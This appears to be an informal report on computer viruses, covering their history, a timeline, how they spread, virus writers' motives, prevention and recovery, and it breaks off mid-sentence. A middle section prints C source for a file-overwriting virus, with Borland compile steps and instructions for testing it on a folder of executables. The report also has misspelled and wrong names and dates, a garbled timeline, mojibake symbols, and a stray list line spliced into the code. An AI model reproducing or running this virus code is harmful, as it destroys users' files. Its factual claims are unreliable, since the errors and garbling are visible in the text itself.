Fiction The Terminal Man, a science fiction novel by Michael Crichton (1972), told (as a sideline story) of a computer with telephone modem dialing capability, which had been programmed to randomly dial phone numbers until it hit a modem that is answered by another computer. It then attempted to program the answering computer with its own program, so that the second computer would also begin dialing random numbers, in search of yet another computer to program. The program is assumed to spread exponentially through susceptible computers. The actual term virus was first used in David Gerrolds 1972 novel, When HARLIE Was One. In that novel, a sentient computer named HARLIE writes viral software to retrieve damaging personal information from other computers to blackmail the man who wants to turn him off. Virus programs History The Creeper virus was first detected on ARPANET, the forerunner of the Internet, in the early 1970s. Creeper was an experimental self-replicating program written by Bob Thomas at BBN Technologies in 1977 Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, Im the creeper, catch me if you can! was displayed. The Reaper program was created to delete Creeper. A program called Elk Cloner was the first computer virus to appear in the wild that is, outside the single computer or lab where it was created. Written in 1981 by Richard Skeena, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk. This virus, created as a practical joke when Skeena was still in high school, was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning Elk Cloner: The program with a personality. The first PC virus in the wild was a boot sector virus dubbed (c) Brain, created in 1986 by the Farooq Alvin Brothers in Lahore, Pakistan, reportedly to deter piracy of the software they had written. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk, usually inadvertently. PCs of the era would attempt to boot first from a floppy if one had been left in the drive. Until floppy disks fell out of use, this was the most successful infection strategy and boot sector viruses were the most common in the wild for many years. Traditional computer viruses emerged in the 1980s, driven by the spread of personal computers and the resultant increase in BBS, modem use, and software sharing. Bulletin board-driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Macro viruses have become common since the mid-1990s. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel and spread throughout Microsoft Office by infecting documents and spreadsheets. Since Word and Excel were also available for Mac OS, most could also spread to Macintosh computers. Although most of these viruses did not have the ability to send infected e-mail, those viruses which did take advantage of the Microsoft Outlook COM interface. Some old versions of Microsoft Word allow macros to replicate themselves with additional blank lines. If two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a mating of the two and would likely be detected as a virus unique from the parents. A virus may also send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. Viruses that spread using cross-site scripting were first reported in 2002, and were academically demonstrated in 2005. There have been multiple instances of the cross-site scripting viruses in the wild, exploiting websites such as MySpace and Yahoo. Time line of computer viruses: In the early years floppy disks (removable media) were in fact the in the late 80s. Ultimately of course, the internet in all its forms became the major source of infection. YEAR VIRUS NAME BY WHOM TYPE 1982 ELK CLONER RICH SKRENTA 1983 COMPUTER VIRUS FRED COHEN 1986 BRAIN PAKISTAN BOOT SECTOR 1988 ARPANET ROBBERT MORRIS ENCRYPTED 1989 AIDS TROJAN 1990 ANTI-VIRUS S/W 1991 NON-ANTI S/W SYMANTEC POLYMORPHIC 1994 HOAX 1995 WORD 1999 MELLISA DAVID L. SMITH 2000 I LOVE U FILIPINE STUDENT 2001 CODE RED WORM 2003 SLAMMER 2004 MY DOON/NOVARG 2005 COMMWARRIOR-A RUSSIA CELL PHONE 2008 CONFICKER 2009 CYNER ATTACK W32.DOZOR 2010 STUNEXT TROJAN 2011 HTTP BOT BLACK SHADES Programming language used for creating Computer Viruses: C C++ Assembler PHP JAVA SCRIPT VB SCRIPT MICRO LANGUAGE/CODE How Computer Viruses Work As youll see in the next section, the term virus was applied to this type of software very early in its history. Its an apt metaphor, because a computer virus is, in many ways, similar to the biological Viruses that attack human bodies. A biological virus isnt truly a living, independent entity; as biologists will tell you, a virus is nothing more than a fragment of DNA sheathed in a protective jacket. It reproduces by injecting its DNA into a host cell. The DNA then uses the host cells normal mechanisms to reproduce itself. A computer virus is like a biological virus in that it also isnt an independent entity; it must Piggyback on a host (another program or document) in order to propagate. How a virus infects your computer 1. Virus program is launched. 2. Virus code is loaded into PC memory. 3. Virus delivers its destructive payload. 4. Virus copies itself to other programs. How Computer Viruses Work 5 If all a virus did was copy itself to additional programs and computers, there would be little Harm done, save for having all our programs get slightly larger (thanks to the virus code). Unfortunately, most viruses not only replicate themselves, they also perform other operations-many of which are wholly destructive. A virus might, for example, delete certain files on your computer. It might overwrite the boot sector of your hard disk, making the disk inaccessible. It might write Messages on your screen, or cause your system to emit rude noises. It might also hijack your E-mail program and use the program to send it to all your friends and colleagues, thus replicating itself to a large number of PCs. Viruses that replicate themselves via e-mail or over a computer network cause the subsidiary Problem of increasing the amount of Internet and network traffic. These fast-replicating viruses Called worms can completely overload a company network, shutting down servers and forcing ten s of thousands of users offline. While no individual machines might be damaged, this type of Communications disruption can be quite costly. As you might suspect, most viruses are designed to deliver their payload when theyre first executed. However, some viruses wont attack until specifically prompted, typically on a predetermined Date or day of the week. They stay on your system, hidden from sight like a sleeper Agent in a spy novel, until theyre awoken on a specific date; then they go about the work them were programmed to do. In short, viruses are nasty little bits of computer code, designed to inflict as much damage As possible, and to spread to as many computers as possible-a particularly vicious combination. How to Create a Computer Virus? This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Heres the source code of the virus program. #include #include #include #include #include #include FILE *virus,*host; int done, a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(*.*,ffblk,0); while(!done) { virus=fopen(_argv[0],r3. Virus delivers its destructive payload. b); host=fopen(ffblk.ff_name,rb+); if(host==NULL) goto next; x=89088; printf(Infecting %sn,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(ffblk); } } printf(DONE! (Total Files Infected= %d),a); end=clock(); printf(TIME TAKEN=%f SECn, (end-st)/CLK_TCK); getch(); } COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile 2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR ITS SIZE) 4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 5. Once again follow the STEP 1 STEP 2.Now the generated EXE File is ready to infect USING BORLAND C++ 5.5 (32-BIT) : 1. Compile once, note down the generated EXE file length in bytes 2. Change the value of X in source code to this length in bytes 3. Recompile it. The new EXE file is ready to infect HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH PASTING IN THE NEW FOLDER) 3. Run the virus EXE file there you will see all the files in the current directory get infected. 4. All the infected files will be ready to re-infect. Why Viruses Exist Computer viruses, unlike biological viruses, dont spring up out of now here-theyre created. By people. And the people-programmers and developers, typically-who create computer viruses Know what theyre doing. These code writers deliberately create programs that they know will Wreak havoc on huge numbers of computer users. The question is why? It takes some degree of technical skill to create a virus. To that end, creating a computer Virus is no different than creating any other computer application. Any computer programmer or Developer with a minimal amount of skill can create a virus-all it takes is knowledge of a programming Language, such as C, Visual Basic, or Java, or a macro language, such as VBA. By using a build your own virus program-of which there are several available, Via the Internet underground. So, by definition, a virus writer is a person with a certain amount of technical expertise. But Instead of using that expertise productively, virus writers use it to generate indiscriminate mayhem among other computer users. This havoc-wreaking is, in almost all instances, deliberate. Virus writers intend to be destructive. They get some sort of kick out of causing as much damage as possible, from the relative Anonymity of their computer keyboards. Understanding Computer Viruses In addition, some developers create viruses to prove their technical prowess. Among certain Developers, writing a successful virus provides a kind of bragging right, and demonstrates, in some warped fashion, that the writer is especially skilled. Unfortunately, the one attribute that virus writers apparently lack is ethical sense. Virus programs can be enormously destructive, and it takes a peculiar lack of ethics to deliberately perpetrate such destruction on such a wide scale. In the end, a virus writer is no better than a common vandal. Except for the technical expertise required, the difference between throwing a rock through a window and destroying PC files via a virus is minimal. Some people find pleasure in destruction, and in our high-tech age, such Pleasure can come from writing destructive virus code. What You Can Do About Computer Viruses Theres very little you can do, on a personal level, to discourage those high-tech vandals who create Virus programs. There are plenty of laws already on the books that can be used to prosecute these criminals, and such criminal investigations-and prosecutions-have become more common in recent years. However, as with most criminal activity, the presence of laws doesnt always mean there are fewer criminals; the truth is, theres a new batch of virus writers coming online every day. All of which means that you cant rely on anyone else to protect you from these virus-writing Criminals. Ultimately, you have to protect yourself. Reducing Your Chances of Infection To make yourself less of a target for virus infection, take the following steps: Restrict your file downloading to known or secure sources. The surest way to catch a virus is to download an unknown file from an unknown site; try not to put you at risk like this unless you absolutely have to. Dont open any e-mail attachments you werent expecting. The majority of viruses today arrive in your mailbox as attachments to e-mail messages; resist the temptation to open or view every file attachment you receive. Use an up-to-date anti-virus program or service. Antivirus programs work; they scan the files on your computer (as well as new files you download and e-mail messages you receive) and check for any previously identified viruses. Theyre a good first line of defence, As long as you keep the programs up-to-date with information about the very latest viruses and most antivirus programs make it easy to download updates. Enable macro virus protection in all your applications. Most current Microsoft Applications include special features that keep the program from running unknown macros and thus prevent your system from being infected by macro viruses. Create backup copies of all your important data. If worse comes to worst and your Entire system is infected; you may need to revert to no infected versions of your most critical Files. You cant do this unless you plan ahead and back up your important data. Preventing Viruses Attacks. Diagnosing a Virus Infection How do you know if your computer has been infected with a virus? In short, if it starts acting Funny-doing anything it didnt do before-then a probable cause is some sort of computer Virus. Here are some symptoms to watch for: à ¢Ã¢â€š ¬Ã‚ ¢ Programs quit working or freeze up. à ¢Ã¢â€š ¬Ã‚ ¢ Documents become inaccessible. à ¢Ã¢â€š ¬Ã‚ ¢ Computer freezes up or wont start properly. à ¢Ã¢â€š ¬Ã‚ ¢ The CAPS LOCK key quits working-or works intermittently. à ¢Ã¢â€š ¬Ã‚ ¢ Files increase in size. à ¢Ã¢â€š ¬Ã‚ ¢ Frequent error messages appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Strange messages or pictures appear onscreen. à ¢Ã¢â€š ¬Ã‚ ¢ Your PC emits strange sounds. à ¢Ã¢â€š ¬Ã‚ ¢ Friends and colleagues inform you that theyve received strange e-mails from you, that you dont remember sending. How to Catch a Virus. Recovering from a Virus Attack If youre unfortunate enough to be the victim of a virus attack, your options narrow. You have to find the infected files on your computer, and then either dies-infects them (by removing the virus Code) or delete them-hopefully before the virus has done any permanent damage to your system. You dont, however, have to give up and throw your computer away. Almost all viruses can be recovered from-some quite easily. All you need is a little information, and the right tools. The right tools include one of the major antivirus programs discussed in Anti-Virus Software and Services. These programs-such as Norton Antivirus